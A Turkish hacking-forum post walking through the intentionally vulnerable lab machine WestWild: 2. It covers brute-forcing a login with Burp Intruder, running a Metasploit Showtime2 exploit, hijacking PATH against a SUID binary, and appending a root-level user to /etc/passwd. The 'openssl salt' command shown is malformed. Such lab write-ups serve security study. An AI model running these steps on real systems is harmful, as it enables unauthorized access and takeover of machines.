WestWild: 2 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere "Westwild: 2 zafiyetli makinesinin "çözümünü göstereceğim.

APM7O5.png


https://drive.google.com/file/d/1owIaiHIEBerX3TehKFdSCu2z76OX6KsT/view

5xJRdf.png


Makine İsmi: Westwild:2

Yapımcı: Hashim Alsharef

Seri: Westwild

Açıklama: Hedefte ki Flag'ı bulmak

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta


RGQJLC.gif


İlk olarak ağ taraması yapalım
Kod:
netdiscover

ALMgot.jpg


Hedefimiz IP adresini bulduk gördüğünüz gibi.

OhIphm.jpg


NMAP taraması yaptığımızda ssh ve http portları açık olduğunu görüyoruz.

MfWWjX.jpg


Siteye gittik ve normal bir site tasarımı olduğunu gördük. Tıklanak yerlere tıklayıp kaynak kodlarına baktım fakat bir şey bulamadım.

oD1hy6.jpg


Daha sonra siteyi kazımak için dirb aracını kullandım. admin/aspadmin olduğunu gördüm şansımı denemek için oraya gittim.

mqRMbE.jpg


Burada 2 adet dosya olduğunu gördüm. Bunlar şifre ve kullanıcı adı listesiydi.

2tCGWd.jpg


Bunları çekmek için
Kod:
wget http://192.168.1.105/admin/aspadmin/user.list
wget http://192.168.1.105/admin/aspadmin/password.list
yazdım ve dosyaları indirdim. İçlerine baktığımda listeler olduğunu gördüm.

qXsefb.jpg


mnyZsv.jpg


Daha sonra admin/login.php olduğunu görmüştüm siteyi kazıdığımda. Oraya girdiğim de giriş ekranı geldiğini gördüm. Burp ile siteye istek gönderdim.

v038Pu.jpg


Daha sonra sağ tık yapıp Intruder'e yolladım.

QZmgX6.jpg


Cluster Bomb'ı seçtim ve sağdan Clear diyelim. Ardından kullanıcı adında ki admin ve şifrede ki admin kısımlarına sağdan Add yapalım.

2V47bQ.jpg


Payloads kısmına gelerek 1'e kullanıcı adlarını 2'ye de şifre listelerini ekliyelim.

2QAVQl.jpg


Ardından tekrar Positions kısmına gelerek sağda ki Attack kısmına tıklayalım ve saldırı başlasın :) Bir süre sonra kullanıcı adı ve şifreyi bulduk.

Aa8Uyl.jpg


Ardından siteye tekrar giderek giriş yaptığımızda böyle bir admin paneli karşılıyor bizleri

52QPiS.jpg


Content kısmında Showtime2'ye tıkladık.

qy3IuV.jpg


İnternette biraz araştırma yaptıktan sonra exploiti olduğunu öğrendim. msfconsole yazarak terminalde açalım.

wLxNCY.jpg


Ardından search showtime2 yazalım ve exploiti arayalım. Ayarlarını görmek için
Kod:
show options
yazalım.

4j9dkf.jpg


Gerekli ayarları yapmak için
Kod:
set RHOSTS 192.168.1.8
set USERNAME west
set PASSWORD madison
yazalım ve exploit yazarak exploit'i çalıştıralım. Ardından meterpreter de shell yazalım.

9qCdI3.jpg


Tam olarak giriş yapamadık yani izin vermedi. O yüzden python yardımıyla bunu düzelteceğiz. Tekrar konsola
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
yazalım.
Gördüğünüz gibi izni aldık
SUID iznine sahip dosyaları bulmak için
Kod:
find / -perm -u=s -type f 2>/dev/null
yazalım.
Bizlere /usr/bin/network_info isimli bir dosya verdi bunu daha da açacağız.

QvbhK4.jpg


Kod:
cd /tmp
ile tmp dizinine girelim. Ardından
Kod:
echo "/bin/bash" > ifconfig
yazalım. Bir komut yazdığımızda PATH değişkeni bizlere dönüt verir. Yetki yükseltmek için
Kod:
chmod 777 ifconfig
ve
Kod:
export PATH=/tmp:$PATH
ardından west kullanıcısına gitmek için
Kod:
/usr/bin/network_info
yazalım ve
Kod:
whoami
yazdık. Gördüğünüz gibi wside isimli bir kullanıcı olduğunu göstermektedir.

fzd2l2.jpg


LinEnum ile yetki yükseltmesi yapacağız. Bunun için
Kod:
git clone https://github.com/rebootuser/LinEnum/
yazalım ardından
Kod:
chmod 777 LinEnum.sh
yazarak yetkisini yükseltelim. Ardından çalıştırmak için
Kod:
./LinEnum.sh
yazalım.

oqtEVj.jpg


FDNjUS.jpg


Burada root ile passwd dizininde işlem yapılmış.

L2kL1p.jpg


Burada biraz zorlandım açıkcası fakat sonra openssl salt yöntemi ile çözümü buldum. Bu yöntem ile MD5 ile şifrelenmiş karma bir şifre verir bizlere. Terminale
Kod:
openssl salt -1 user pass123
yazalım ve kodu kopyalayalım.

vtNV2I.jpg


Daha sonra makineye tekrar gelerek
Kod:
echo 'p4rstht:$1$user3$rAGRVf5p2jYTqt0W5cPu/:0:0::/root:/bin/bash' >> /etc/passwd
yazalım ve yetkiyi alalım. Ardından
Kod:
su p4rstht
yazalım ve şifreyi yazalım. İşlem başarılı! :))

eBbtSv.jpg


FLAG'ı aldık :)

O6k4iX.jpg



f4XPQV.png



Konum bu kadardı arkadaşlar, bir sonraki konumda görüşmek üzere sağlıcakla...







 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.